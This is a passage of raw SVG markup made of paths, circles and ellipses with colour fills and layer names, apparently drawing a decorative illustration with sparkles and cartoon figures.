d="M253.8 909.9c-4.6-.3-13.3-.4-19.4-.7l-1.6 2.9a109.9 109.9 0 0027.5 6.2c2.5-4.8-.4-8-6.5-8.4z"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.289"
d="M205.2 913.4a47.1 47.1 0 005-26.1M225.4 897.8c-.1 8.7-1.6 15.7-5.8 21.5"></path>
<path fill="none" stroke="#039c78" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.289"
d="M312.9 806.9c1.7-6 7.6-12.2 10.3-14"></path>
<path fill="none" stroke="#039c78" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.289"
d="M319.2 772L314.7 769.4"></path>
</g>
<path fill="#91ffad"
d="M240.6 690.9a30.2 30.2 0 01-13.5-20.8l-2.2-14.6a1.4 1.4 0 00-1.4-1.2 1.4 1.4 0 00-1.5 1.2l-2.2 14.6a29.7 29.7 0 01-13.4 20.8l-1.9 1.2a1.7 1.7 0 00-.7 1.3 1.5 1.5 0 00.7 1.2l1.9 1.2a29.7 29.7 0 0113.4 20.8l2.2 14.6a1.4 1.4 0 001.5 1.2 1.4 1.4 0 001.4-1.2l2.2-14.6a30.2 30.2 0 0113.5-20.8l1.8-1.2a1.3 1.3 0 00.7-1.2 1.5 1.5 0 00-.7-1.3z"
data-name="Layer 20"></path>
<path fill="#66bcff"
d="M1376.2 297.5a24.6 24.6 0 01-11.1-17.2l-1.8-12a1.3 1.3 0 00-1.2-1.1 1.3 1.3 0 00-1.2 1.1l-1.8 12a25 25 0 01-11.1 17.2l-1.6 1a1.3 1.3 0 00-.6 1 1.3 1.3 0 00.6 1l1.6 1a25.2 25.2 0 0111.1 17.3l1.8 12a1.2 1.2 0 001.2 1 1.2 1.2 0 001.2-1l1.8-12a24.8 24.8 0 0111.1-17.3l1.6-1a1.2 1.2 0 00.5-1 1.2 1.2 0 00-.5-1z"
data-name="Layer 19"></path>
<path fill="#3442d9"
d="M1464.3 954.2a44.2 44.2 0 01-19.8-30.6l-3.2-21.4a2.1 2.1 0 00-2.1-1.8 2.1 2.1 0 00-2.1 1.8l-3.2 21.4a44.2 44.2 0 01-19.8 30.6l-2.8 1.8a2.1 2.1 0 00-.9 1.8v.2a2.1 2.1 0 00.9 1.8l2.8 1.8a44 44 0 0119.8 30.6l3.2 21.3a2.1 2.1 0 002.1 1.9 2.1 2.1 0 002.1-1.9l3.2-21.3a44 44 0 0119.8-30.6l2.8-1.8a2.2 2.2 0 001-1.8v-.2a2.2 2.2 0 00-1-1.8z"
data-name="Layer 18"></path>
<path fill="#ff78b9"
d="M789.5 845.4a13.5 13.5 0 01-6.1-9.3l-.9-6.6a.9.9 0 00-.7-.6.6.6 0 00-.6.6l-1 6.6a13.5 13.5 0 01-6.1 9.3l-.8.6a.5.5 0 00-.3.5.5.5 0 00.3.5l.8.6a13.5 13.5 0 016.1 9.3l1 6.6a.6.6 0 00.6.6.9.9 0 00.7-.6l.9-6.6a13.5 13.5 0 016.1-9.3l.8-.6a.5.5 0 00.3-.5.5.5 0 00-.3-.5z"
data-name="Layer 17"></path>
<path fill="#ff78b9"
d="M843.2 146.5a8.2 8.2 0 01-3.7-5.8l-.6-4c0-.2-.2-.3-.4-.3s-.4.1-.4.3l-.6 4a8.2 8.2 0 01-3.7 5.8l-.5.3-.2.3c0 .1.1.2.2.3l.5.3a8.2 8.2 0 013.7 5.8l.6 4c0 .2.2.3.4.3s.4-.1.4-.3l.6-4a8.2 8.2 0 013.7-5.8l.5-.3c.1-.1.2-.2.2-.3l-.2-.3z"
data-name="Layer 16"></path>
<g data-name="Layer 15">
<circle cx="1427.5" cy="531.4" r="98.7" fill="#66bcff"></circle>
<circle cx="1427.5" cy="531.4" r="98.7" fill="#66bcff"></circle>
<circle cx="1427.5" cy="531.4" r="98.7" fill="#66bcff"></circle>
<circle cx="1427.5" cy="531.4" r="108.1" fill="none" stroke="#29cc7a" stroke-miterlimit="10"
stroke-width="6.883"></circle>
<path fill="#eb459f"
d="M1354.8 562a25.8 25.8 0 00-18.4 7.4 97.8 97.8 0 0031.3 40.5 25.8 25.8 0 00-12.9-47.9z"></path>
<path fill="#bf0f76"
d="M1344.2 570.2c.3 1.7 4.9 3.9 11.5 4.9s11.8.2 12.5-1.4a169.2 169.2 0 006.5-15.7c1.1-3.2-1.1-8.1-13.2-9s-16 .7-17.9 3.3-1.2 9.2.6 17.9z">
</path>
<path fill="#ffe75c"
d="M1382.9 507.9c-2.1-.3-4.6.7-7.6 7.2.3-8.2.1-16.4.1-20.3s-1.8-5.1-3.9-5.3a4.3 4.3 0 00-4.8 4.1c-.3 3.1-.6 12.5-.7 15.6s-.2 3.7-.6 3.7-.9-1-1.5-3.2a103 103 0 00-4-10.7c-2-4.8-2.6-7.8-9.1-6.4s-11.7 7.1-13.3 10.9.5 7.1 5.3 18.9c-3.7 15.4-3.3 17.6-.9 20.7s7.9 2.9 17 2.3c20-1.3 19.9-2.6 22.1-11.3s3.5-16.1 4-19.1.7-6.7-2.1-7.1z">
</path>
<path
d="M1371.9 522.7a1 1 0 00.7-.7 74.2 74.2 0 012.7-7c0-1.4.1-2.9.1-4.3a51.3 51.3 0 00-4.4 10.2c-8.9 1.4-13.9 5.8-15.7 14a1 1 0 00.8 1.1h.2a1 1 0 00.9-.7c1.6-7.6 6.2-11.5 14.7-12.6z">
</path>
<path fill="#ffe75c" d="M1352.6 544.2c-.2 4.1-.1 9.8-.1 9.8l15.4 1.1.9-13.2z"></path>
<path fill="#eb459f"
d="M1416.3 546.9c-22.5 4.3-27.8 22.7-26 43.8-10 6.5-13.7 14-13.6 25.3a98.6 98.6 0 00111.9-7.1l4-56.1s-53.7-10.1-76.3-5.9z">
</path>
<path fill="#eb459f"
d="M1380.5 575.1c-12.6 4.2-20.4 13.5-22.4 26.5a98.9 98.9 0 0043.6 25.1l12.3-80.6c-18.3-2.4-34.5 7.3-33.5 29z">
</path>
<path d="M1419.5 560.2c-10.5-21.2-16.1-23.4-15-29.9s15.6-6.9 34.9-6.8-1 35.5-1 35.5z"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-linejoin="round" stroke-width="2.238"
d="M1416.3 546.9c-22.5 4.3-27.8 22.7-26 43.8-9.4 6.1-13.2 13.2-13.6 23.4"></path>
<path fill="none" stroke="#fff" stroke-linecap="round" stroke-linejoin="round" stroke-width="2.238"
d="M1447.3 554c-23 10.2-20 17.7-13.2 37.5a40.1 40.1 0 00-12.3 37.6"></path>
<path fill="url(#linear-gradient-2)"
d="M1473.8 428.5c6.8-8.7 15.8-13.6 24.3-11.4s10.3 7 14.9 33.2c15.9 8.4 17.8 10.6 5.2 28.9 11.6 11.5 13.1 17.4-1.9 30.4l-16.5.8c-14.1-11.7-16.6-12.2-9.8-29.1-22.3-26.7-19.5-31.6-16.2-52.8z">
</path>
<path fill="none" stroke="#fff" stroke-linecap="round" stroke-linejoin="round" stroke-width="2.238"
d="M1495.3 482.7c0-3.2 1.6-5.7 3.5-5.7s3.6 2.5 3.6 5.7"></path>
<circle cx="1490.8" cy="451.2" r="9.2" fill="#4452f2"></circle>
<circle cx="1487.3" cy="437.7" r="9.2" fill="#4452f2"></circle>
<circle cx="1475.5" cy="433.6" r="9.2" fill="#4452f2"></circle>
<circle cx="1466.4" cy="431.5" r="5.6" fill="#4452f2"></circle>
<path fill="url(#linear-gradient-3)"
d="M1435.2 565.3c18.2 0 32.6-9.5 41.4-17.5a34.4 34.4 0 0010.7-20.8c1.5-11.8 3.9-31.9 5.2-52.4 2-31.9-18-44.7-36.9-43s-34.6 11.7-38.1 43c-21.9 0-29.8 3-31.3 11.1s8.2 13.4 22.5 19.5c3.4 1.4 3.8 1.7 4.4 3.7s2.8 12.1 16 22.8c-3.4 8.1-4.2 14.4-3.3 23.6s5.8 10 9.4 10z">
</path>
<path fill="#bf0f76"
d="M1434.1 559.3c-7.7-19.5-11.5-22.7-25.7-33.2-2.3 1-3.6 2.3-3.9 4.2-1.1 6.5 4.5 8.7 15 29.9z"></path>
<path fill="#ffe75c" d="M1485.8 467.5c18-1.3 22.7-.6 23.6 3.8s-4.3 7.9-22.7 17.4z"></path>
<path fill="#c40655"
d="M1446.8 493.8c-1 2.8-1 7.5-.9 12.7s.6 11.9-5.8 12.4-9.8-6.9-11.5-10.1-2.1-3.6-3-4.1-4.6-2.4-7.9-4.1-5.3-3.4-4.4-4.4 9.6.8 19 1.7 10.9-2.1 13.6-5.3c.5-.6 1.5-.6.9 1.2z">
</path>
<path
d="M1445.9 492.6c-2 2.4-3.4 4.7-7.9 5.3a10.1 10.1 0 00-.3 1.7c-.4 5 2 9.1 5.3 9.1a4.8 4.8 0 002.9-1.1v-1.1c-.1-5.2-.1-9.9.9-12.7s-.4-1.8-.9-1.2z">
</path>
<path fill="none" stroke="#ffae00" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.5"
d="M1444.5 485.9a23.5 23.5 0 009.1 6.1"></path>
<path fill="#4452f2"
d="M1430.8 512.9c2 3.1 5 6.4 9.3 6 6.4-.5 5.9-7.2 5.8-12.4 0-1.9-.1-3.7 0-5.4-6.7-1.2-14 2-15.1 11.8z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-linejoin="round" stroke-width="2.238"
d="M1443.3 499.9c-3.1 1.8-6.7 6.4-7 13.2M1420.6 474.1c.9-6.2 2.5-8.3 3.6-8.5s1 2.3.6 7.9M1450.6 473.5c2.1-9.1 5.1-9.6 6.4-9s2.2 2.9 1.9 9.6">
</path>
<ellipse cx="1466.2" cy="477.8" fill="#fa80ba" rx="7.2" ry="5.7" transform="rotate(-36.1 1466.316 477.85)">
</ellipse>
<path fill="none" stroke="#fff" stroke-linecap="round" stroke-linejoin="round" stroke-width="2.238"
d="M1502.4 482.7c0 3.1-1.6 5.6-3.6 5.6s-3.5-2.5-3.5-5.6"></path>
<path fill="#fff"
d="M1496.9 501.6l-2.7-5a.8.8 0 010-.7l3.8-5.3a.6.6 0 011.1.1l2.3 4.8a.6.6 0 010 .6l-3.4 5.5a.7.7 0 01-1.1 0z">
</path>
<path fill="#4452f2" d="M1516.3 509.6l-16.5.8c-2.2 1.4-1.4 2.3 0 3.6l16.4-.6c2.5-2.1 1.8-2.5.1-3.8z"></path>
<path fill="#ffe75c" d="M1516.2 513.4c1.1 4.6 1.6 7.7 1.9 9.6s-.5 3-10 3.3-9.1-1.2-9-3.5.7-8.8.7-8.8z">
</path>
<path fill="#bf0f76"
d="M1488.2 545.1c4.8-17.5 6.4-23.2-3.4-22.7a334.3 334.3 0 00-37.1 4c-9 1.6-8.8 2.8-4.4 32.6z"></path>
<path fill="#fff"
d="M1389.6 541.2a2.1 2.1 0 00-2 2.4l5.4 39.2a4.8 4.8 0 001.7 3c1.5 1.1 4.3 2.4 9.3 2.4s7.8-1.3 9.2-2.4a4.8 4.8 0 001.7-3l5.5-39.2a2.1 2.1 0 00-2.1-2.4z">
</path>
<path fill="none" stroke="#fff" stroke-linecap="round" stroke-linejoin="round" stroke-width="5"
d="M1413.1 548.5c5.9-.4 8.6-.5 10 1.7s.4 6.1-.8 12.7-2.7 5.5-10.2 6"></path>
<ellipse cx="1456.6" cy="452.8" rx="1.4" ry="3.8" transform="rotate(-82 1457.448 452.514)"></ellipse>
<ellipse cx="1423.2" cy="456" rx="1.2" ry="2.6" transform="rotate(-82 1423.962 455.72)"></ellipse>
<circle cx="1479.4" cy="628.7" r="27.3" fill="#eb459f"></circle>
<path fill="#eb459f"
d="M1432.3 559c29.3-11.3 48.2-18.5 61.5-20.6a32.6 32.6 0 0118.5 2.3c19.7 8.8 14.7 29.6 8.2 39.6 12.4 8.6 18.6 24.4 5.8 42.5 11 9.4 17.6 29.9 3.3 42.4s-35.8 8.6-44.6-10.3z">
</path>
<path fill="#bf0f76"
d="M1455.9 620.2c1.6 1 6.6-.8 12.3-5.1s8.8-8.7 8.2-10.5c-2.2-6.1-5.5-13.3-7.1-16.6s-6.9-5.1-16.6 3.3-11.3 12.7-10.8 16.1 6.1 7.7 14 12.8z">
</path>
<path fill="#ffe75c"
d="M1449.5 585.1c9.3-10.4 12.9-17.6 13.5-20.9s.8-6.1-6.9-13.1-12-9.1-15.8-8.8-7.3 4.6-10.6 13.4c-.5 1.5 5 4.9 3.4 5.3-9.1 2.8-11.7 15-13.1 20.2s-1.6 9.7 5.3 13.8 9.7 6.4 24.2-9.9z">
</path>
<path fill="#ffe75c" d="M1437.2 550.8c-12.1.4-17.7 1.3-20.3 2.6s-2.5 4-2.1 6.6.9 3.5 7.4 3.7 15 0 15 0z">
</path>
<path fill="#ffe75c" d="M1441.1 592.7L1448.1 601.1 1460.3 591.3 1451.8 579 1441.1 592.7z"></path>
<path
d="M1345.5 494.9a11 11 0 00-2.1 1.4 1.6 1.6 0 00-.6 1.8c.7 3.6 3.3 9.6 8.7 20a1.1 1.1 0 00.9.6l.4-.2a.8.8 0 00.4-1.2c-9.4-18.2-9.5-21.2-7.7-22.4z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-linejoin="round" stroke-width="2.238"
d="M1439.3 551.5c-5.1 2.6-5.5 7.3-4.6 11.3-5 2.3-6.3 5.1-5.4 11.3-2.7 1.6-5 3.6-4.1 8.6"></path>
<path d="M1441.6 593.2L1445.9 589.2 1444.4 596.6 1441.6 593.2z"></path>
<path d="M1352.5 545.8L1365.2 545 1352.5 551.8 1352.5 545.8z"></path>
<path fill="#eb459f" d="M1343.2 564.8L1370.7 568.2 1370.6 577.3 1341.9 575.5 1343.2 564.8z"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-linejoin="round" stroke-width="2.238"
d="M1505.5 620.5a27.3 27.3 0 00-26.1-19.1M1489.4 580.9a27.6 27.6 0 00-5.6 20.1"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-linejoin="round" stroke-width="2.238"
d="M1485.8 587.1L1483.2 582.7"></path>
</g>
<g data-name="Layer 14">
<path fill="#ffc619"
d="M1259.3 840.4a34 34 0 00-13.9-.1c-.8-5.7-5.4-11.2-16.9-21.7-14.8-13.5-18.6-30.4-18.6-47.5l-41 33.3-9.8 41.2c14.7-3.5 29.6-5.7 45.1.6l5.2 2.4a5.1 5.1 0 01.8 8.5c-4.5 3.5-7.6 6.7-7.9 6.9a105.9 105.9 0 00-10.4 11.7c-17.2 23.5-12.2 42.3 9.6 41.1 19.1-1 44.5-16.9 58.9-35.6s15.5-36.8-1.1-40.8zm-4.7 33.7c-13.5 17.4-38.2 32.7-48.7 32.7s-7.6-13.5 6.6-30.2 34.1-30.4 44.6-30.4 9.8 12-2.5 27.9z">
</path>
<path fill="#ff8c19"
d="M1209.8 771.2c.3 7.7-1.5 17-5.2 26.5-8.9 22.9-26.7 42.1-42.5 47.2l7-1.4c14.3-7.7 29.1-25.1 36.9-45.3a73.7 73.7 0 004.5-15.9 105.1 105.1 0 01-.6-11.2z">
</path>
<ellipse cx="1172.7" cy="797.3" fill="#ffc619" rx="54.4" ry="28.8"
transform="rotate(-59.3 1172.518 797.226)"></ellipse>
<path fill="#ff8c19"
d="M1191 753.5c-15.2 0-36.6 21.2-46.6 46.3s-4.5 41.1 10.6 39 33.1-20.9 42.9-43 7.5-42.3-6.9-42.3z"></path>
<path fill="#ff8c19"
d="M1191 753.5c-15.2 0-36.6 21.2-46.6 46.3s-4.5 41.1 10.6 39 33.1-20.9 42.9-43 7.5-42.3-6.9-42.3z"></path>
<path
d="M1197.9 795.8a96 96 0 004.6-13.3 7.9 7.9 0 00-5.7-2.2c-10.2 0-24.6 14.3-31.4 31.2-4.3 10.9-4.2 19.6-.7 23.8 12.3-6.8 25.5-22.2 33.2-39.5z">
</path>
<path fill="url(#linear-gradient-4)"
d="M1196.6 798.5a104 104 0 01-10.6 17.3c-6.8 2.5-8.4 8.9-12 16.1-4.5 9-12.2 17.6-25.8 23.4-23.4 10-41.5-.5-47.1-6.1s-2.9-12.5 7.1-13.4 22.6-1.2 31.3-14.1a40.1 40.1 0 003.4-6.2c8-19.1 20.7-19.3 27.8-14.9 9.3-5.9 18.5-6 25.9-2.1z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="1.703"
d="M1170.7 800.6c-10.9 7.4-12.9 21.1-20.5 30.1s-14.7 10.3-14.7 10.3"></path>
<path fill="#fff"
d="M1201 758.7l-1.5 3c-1.9 3.5-4.6 3.7-9.6 3.7s-4.3-2.8 1.7-11.9a11.5 11.5 0 019.4 5.2zM1190.6 753.5c-5.4 8.8-7.1 11.9-11.5 11.9s-8.5.2-4.3-5.2a14.7 14.7 0 001-1.3c5.2-3.3 10.2-5.3 14.8-5.4z">
</path>
<path
d="M1244.6 850.1c1.6-2.7 1.8-5.5 1.8-8.6a.8.8 0 00-.9-.8.8.8 0 00-.8.8c0 4.2-.4 7.6-4.6 11.1a50.5 50.5 0 014.5-2.5z">
</path>
<path fill="none" stroke="#ffc619" stroke-linecap="round" stroke-miterlimit="10" stroke-width="5.643"
d="M1226.6 871.1L1234.2 891.2"></path>
<path fill="none" stroke="#ffc619" stroke-linecap="round" stroke-miterlimit="10" stroke-width="5.643"
d="M1234.9 863.9L1242.5 884"></path>
<path fill="none" stroke="#ffc619" stroke-linecap="round" stroke-miterlimit="10" stroke-width="5.643"
d="M1243.2 856.7L1250.8 876.7"></path>
<path fill="none" stroke="#ff8c19" stroke-linecap="round" stroke-miterlimit="10" stroke-width="3.762"
d="M1260.9 859.2c-2-5.1-7.8-5.7-12.9-1.2l-20.6 17.9c-5.2 4.5-7.8 12.4-5.9 17.5s7.8 5.6 12.9 1.1l20.7-17.9c5.1-4.5 7.7-12.3 5.8-17.4z">
</path>
<path fill="#ff8c19"
d="M1254.4 875.1a67.7 67.7 0 005.9-6.1 17.9 17.9 0 003.7-6.9c1.2-5-.6-10.5-2.6-15.8-1-2.6-2.1-5.3-3.2-7.9l-1.7-4c-.6-1.4-1.2-2.8-1.7-4.2a55 55 0 01-2.5-8.8 56.6 56.6 0 01-1.3-9.2 3.8 3.8 0 013.5-4 3.8 3.8 0 014 3.5c.1.2 0 .5 0 .6a45.1 45.1 0 001.6 16.3 29.7 29.7 0 001.3 3.9l1.4 4.1c1 2.8 2 5.5 2.9 8.3a66.6 66.6 0 012.2 8.8 19.3 19.3 0 01-5 17.6 76 76 0 01-6.4 6.3 1.6 1.6 0 01-2.3-.2 1.6 1.6 0 01.2-2.2z">
</path>
<path fill="#fff"
d="M1254.8 804.9a6.5 6.5 0 016.5 6.5v1.8a4.7 4.7 0 01-4.7 4.7h-1.8a6.5 6.5 0 01-6.5-6.5 6.5 6.5 0 016.5-6.5z"
transform="rotate(45 1254.787 811.45)"></path>
<rect width="7.8" height="7.76" x="1250.9" y="806.8" fill="none" stroke="#000" stroke-linecap="round"
stroke-miterlimit="10" stroke-width="1.703" rx="3.9" transform="rotate(45 1254.728 810.625)"></rect>
<path fill="#4ab0ff"
d="M1143 766.4l-14.1-7.9a6.1 6.1 0 01-3.1-5.3v-1a6.1 6.1 0 016.1-6.2 6.1 6.1 0 015.9 4.3z"></path>
<path fill="#66bcff"
d="M1124.9 804.3l-9.1 6.7a4.4 4.4 0 01-4.3.5l-.6-.3a4.4 4.4 0 01-2.3-5.7 4.4 4.4 0 014.4-2.5z"></path>
</g>
<path fill="#6874f7"
d="M537.2 82.7a20.5 20.5 0 00-17 8.9 43.1 43.1 0 00-17.6-3.8 42.6 42.6 0 00-27.9 10.3h82.5a20.8 20.8 0 00-20-15.4z"
data-name="Layer 13"></path>
<g data-name="Layer 12">
<path fill="#808aff"
d="M1519.2 121.3c-.1.2-.3.3-.4.2-3.1-2.2-4.5-1.8-5.3-.7s-.8 2.9-.5 5.5a1.1 1.1 0 01-.7 1.2c-.2.1-.5.1-.6-.1-2.1-2.1-3.2-3.1-4.7-3.4s-4.3.5-6.1 3.5l-6-6.5a20.1 20.1 0 007.5-11.6c.8-3.7 1.9-3.4 6-.1a55.3 55.3 0 0110.8 11.6.3.3 0 010 .4zM1465.7 131.6a.7.7 0 00.6-.1c2-2.6 3.5-2.8 4.6-2.3s1.7 1.9 2.2 3.7a.9.9 0 00.9.6c.2-.1.5-.2.6-.5.9-1.9 1.5-2.8 2.6-3.5a4.6 4.6 0 015.1.5l2.7-5.6a15.3 15.3 0 01-8-7.1c-1.9-3.2-2.7-2.7-5.4 1.2a37.8 37.8 0 00-6 12.6.4.4 0 00.1.5z">
</path>
<circle cx="1491" cy="131.5" r="12.4" fill="#808aff"></circle>
<path fill="#3442d9"
d="M1526.7 74.3a1.1 1.1 0 01-1.1.6c-9.2-2.6-12.4-1-13.7 1.7s.2 5.9 2.6 10.3a1.8 1.8 0 01-.8 2.4 1.5 1.5 0 01-1.6 0c-5.7-2.6-8.7-3.8-12.2-3.7a9.4 9.4 0 00-9.1 7.8l-15.8-7.7c5-8.4 4.6-17 2.5-25.2s.3-9 13-4.8a136.4 136.4 0 0135.8 17.6 1 1 0 01.4 1z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-linejoin="round" stroke-width="1.233"
d="M1487.3 78.1c1.6 6.1 3.1 17.3 3.1 17.3"></path>
<path fill="#3442d9"
d="M1412.2 111a1.1 1.1 0 001.2-.2c4.2-6 7.4-6.6 10-5.5s3.9 3.8 5.2 7.8a1.8 1.8 0 001.9 1.2 1.7 1.7 0 001.3-1c2-4.4 3.2-6.5 5.5-8.1s7-2.3 11.2.5l5.3-12.6c-8.9-2.9-14.4-8.6-18.5-14.9s-6.1-5.5-11.6 3.3a85.8 85.8 0 00-11.9 28.6.9.9 0 00.4.9z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-linejoin="round" stroke-width="1.233"
d="M1436.9 90.6a49.5 49.5 0 008.9 12.7"></path>
<path
d="M1447.6 101.3c5.8-2.2 12.9 1.9 15.8 9.1s.6 14.9-5.2 17.2l16.8-1.1c14.2-5.5 21-13.2 15.5-27.3-4.1-10.4-13.5-13.8-26.3-8.8s-16.6 10.9-16.6 10.9z">
</path>
<path fill="#fff" d="M1458.8 97.7c5.2 6.7 8.3 10.6 9.7 11.6s1.4.2.6-3.4-3.3-16.3-3.3-16.3z"></path>
<path fill="#808aff" d="M1450.3 105.6c3.8 4.9 6.1 7.8 7.1 8.5s1 .1.5-2.6-2.5-11.9-2.5-11.9z"></path>
<path fill="#fff" d="M1475.6 124.3c-.5-6.2-.8-9.8-.5-11s.7-.8 2 1.5l6.3 10.4z"></path>
<path fill="url(#linear-gradient-5)"
d="M1451.6 125.2a7.7 7.7 0 014.7-4.8c3-1 6.6-1.6 14.2.1a12.4 12.4 0 007.8-.5c7.4-2.8 12.1-11.5 10.5-19.4s-8.9-11.9-16.3-9a16.5 16.5 0 00-8.4 7.5c-5 9.3-6.9 11.8-11.3 13.8a8.1 8.1 0 01-6.3.3c-4.8-1.8-7.1-7.9-4.1-15.4a27.4 27.4 0 1135.4 35.8 27.9 27.9 0 01-20.9-.4c-5.5-2.4-6.1-5.5-5.3-8z">
</path>
<path fill="#eb459f"
d="M1483.9 88.8a14.8 14.8 0 00-12.7-.6c-4.3 1.6-7.7 4.8-10.3 9.3s-8.1 13.4-13 13.6a7.2 7.2 0 01-6.1-2.7c0 .1.1.2.1.3a6.6 6.6 0 005.7 4h.4c4.4-.2 8.8-4.6 14.2-14.3a18.7 18.7 0 019.6-8.7 13.3 13.3 0 0111.4.5 14.1 14.1 0 017 10c1.9 9.1-3.4 19.2-11.8 22.5a15.5 15.5 0 01-8.9.5c-8.2-1.6-13.6-1.2-16.6 1.4l-.4.4a3.6 3.6 0 00-.6 4.3 4.9 4.9 0 012-3.5c2.5-2.3 7.7-2.6 15.3-1.1a16.1 16.1 0 009.8-.6c9-3.5 14.7-14.4 12.7-24.2a15.5 15.5 0 00-7.8-11.1z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-linejoin="round" stroke-width="1.233"
d="M1499.5 64.6c15.8 5.2 26.1 9.4 26.1 9.4M1513.3 88.3c-5.2-5.4-12.3-12.3-18.1-18M1429.9 112.9c-1.3-8.8-.7-22.4-.7-22.4M1412.6 110.4a119.9 119.9 0 0111.1-20.7">
</path>
<path fill="#3442d9"
d="M1403.9 154.3h-.4c-1.7-2.2-2.8-2.3-3.7-1.6a7.3 7.3 0 00-1.5 3.8c-.1.4-.4.8-.8.8-.2 0-.3-.1-.4-.3-1-1.9-1.6-2.8-2.7-3.4s-3.2-.6-5.2 1.2l-2.9-6a14.5 14.5 0 007.9-6.9c1.4-2.4 2.1-2 4.4 1.3a37.5 37.5 0 015.3 10.8.2.2 0 010 .3zM1362.8 150.1c.1.1.3.2.4.1 2.1-1.5 3.2-1.3 3.9-.6a4.7 4.7 0 01.7 3.1.6.6 0 00.5.6.7.7 0 00.6-.2 5.7 5.7 0 012.7-2 3.3 3.3 0 013.5 1.5l3.2-3.5a11.4 11.4 0 01-4.2-6.9c-.7-2.7-1.4-2.5-4.2-.3a27.3 27.3 0 00-7.1 7.9.2.2 0 000 .3z">
</path>
<circle cx="1381.2" cy="155.6" r="9.4" fill="#3442d9"></circle>
</g>
<g data-name="Layer 11">
<path fill="#ffc069"
d="M705.1 901.6a24.2 24.2 0 003.1 2.5c4.3 2.8 5.4 5.9 3.5 8.4s-7.2 2.3-11.6-1-6.3-8.2-4.3-11 5.5-2.5 9.3 1.1z">
</path>
<path fill="#3442d9" d="M619.5 989.1H638.6V1000.97H619.5z" transform="rotate(-4.7 629.138 996.059)"></path>
<path fill="#3442d9"
d="M744.6 975.5c9.8-5.9 8.9-13.4-2.2-16.6L722 953c-11.1-3.2-28.3-.9-38.1 5.1l-57.1 34.5c-9.8 6-8.8 13.4 2.2 16.6l20.4 5.9c11.1 3.2 28.3.9 38.1-5.1z">
</path>
<path fill="#d11583" d="M731.8 955.3H750.9V967.17H731.8z" transform="rotate(-4.7 741.61 961.62)"></path>
<path fill="#5865f2"
d="M743.6 963.8c9.9-6 8.9-13.5-2.2-16.7l-20.4-5.8c-11.1-3.2-28.2-.9-38.1 5l-57 34.5c-9.9 6-8.9 13.5 2.2 16.6l20.4 5.9c11.1 3.2 28.2.9 38.1-5.1z">
</path>
<path fill="#d11583"
d="M744.6 975.5l-1.2.7-42.8-23.8c7.5-1.2 15.3-1.1 21.4.6l20.4 5.9a22.5 22.5 0 014.9 2.1c6.2 3.7 5.4 9.6-2.7 14.5z">
</path>
<path fill="#eb459f"
d="M747.3 961a23.7 23.7 0 01-3.7 2.8l-1.1.6-41.9-12-18.8-5.4 1.1-.7c9.9-5.9 27-8.2 38.1-5l20.4 5.8c9.4 2.7 11.6 8.5 5.9 13.9z">
</path>
<path d="M687.7 997.6L742.5 964.4 681.8 947 627 980.1 687.7 997.6z"></path>
<path d="M743.4 976.2L742.5 964.4 687.7 997.6 688.7 1009.3 743.4 976.2z"></path>
<path fill="#fff"
d="M743.2 959.2c9.9-5.9 8.9-13.4-2.2-16.6l-20.4-5.9c-11.1-3.2-28.2-.9-38.1 5.1l-57 34.5c-9.9 6-8.9 13.4 2.2 16.6l20.4 5.9c11.1 3.2 28.2.9 38.1-5.1z">
</path>
<path fill="#ffc619"
d="M621.8 977.4c10 31.8 7.7 35 18.9 23s21.4-18.6 53.3-7.5c38.5 13.5 34.7 13.1 36.9-17.1 1-12.7 8.8-20 14-30.9z">
</path>
<ellipse cx="655.3" cy="980.6" fill="#eb459f" rx="33.2" ry="14.5" transform="rotate(-8 652.378 976.833)">
</ellipse>
<ellipse cx="690.6" cy="968.9" fill="#d11583" rx="33.2" ry="14.5" transform="rotate(-8 687.65 965.648)">
</ellipse>
<ellipse cx="715.2" cy="948.7" fill="#eb459f" rx="33.2" ry="14.5" transform="rotate(-8 712.081 945.082)">
</ellipse>
<path fill="#29cc7a"
d="M720.7 930.5l-100.4 39.2c-10.7 3.9-9.5 13.2 2.6 12.7a39.9 39.9 0 0127.6 9.7c5.6 4.9 13.2 5 20.9-.8s15.2-9.7 24.6-11.8 19.7-8.4 24.7-15.3 14.1-11.4 19.8-12.7 12.8-2.5 12.7-10.4-13-11.9-32.5-10.6z">
</path>
<path fill="#3442d9" d="M617.1 959.3H636.2V971.17H617.1z" transform="rotate(-4.7 626.733 965.45)"></path>
<path fill="#3442d9"
d="M742.1 945.7c9.9-6 8.9-13.5-2.2-16.7l-20.4-5.8c-11.1-3.2-28.2-.9-38.1 5l-57 34.5c-9.9 6-8.9 13.5 2.2 16.6l20.4 5.9c11.1 3.2 28.2.9 38.1-5.1z">
</path>
<path fill="#d11583" d="M729.3 925.4H748.4V937.27H729.3z" transform="matrix(1 -.08 .08 1 -73.89 63.73)">
</path>
<path fill="#5865f2"
d="M741.2 933.9c9.8-6 8.8-13.5-2.3-16.7l-20.4-5.8c-11.1-3.2-28.2-.9-38.1 5l-57 34.5c-9.9 6-8.9 13.5 2.2 16.7l20.4 5.8c11.1 3.2 28.2.9 38.1-5z">
</path>
<path fill="#d11583"
d="M742.1 945.6l-1.1.7-42.9-23.8c7.5-1.2 15.4-1.1 21.4.7l20.4 5.8a23.5 23.5 0 015 2.1c6.1 3.7 5.3 9.7-2.8 14.5z">
</path>
<path fill="#eb459f"
d="M744.9 931.1a29.7 29.7 0 01-3.7 2.8l-1.2.7-41.9-12.1-18.8-5.4 1.1-.7c9.9-5.9 27.1-8.2 38.1-5l20.4 5.9c9.5 2.7 11.6 8.5 6 13.8z">
</path>
<path fill="#3442d9" d="M685.3 967.7L740 934.6 679.3 917.1 624.5 950.2 685.3 967.7z"></path>
<path d="M741 946.3L740 934.6 685.3 967.7 686.2 979.5 741 946.3z"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.096"
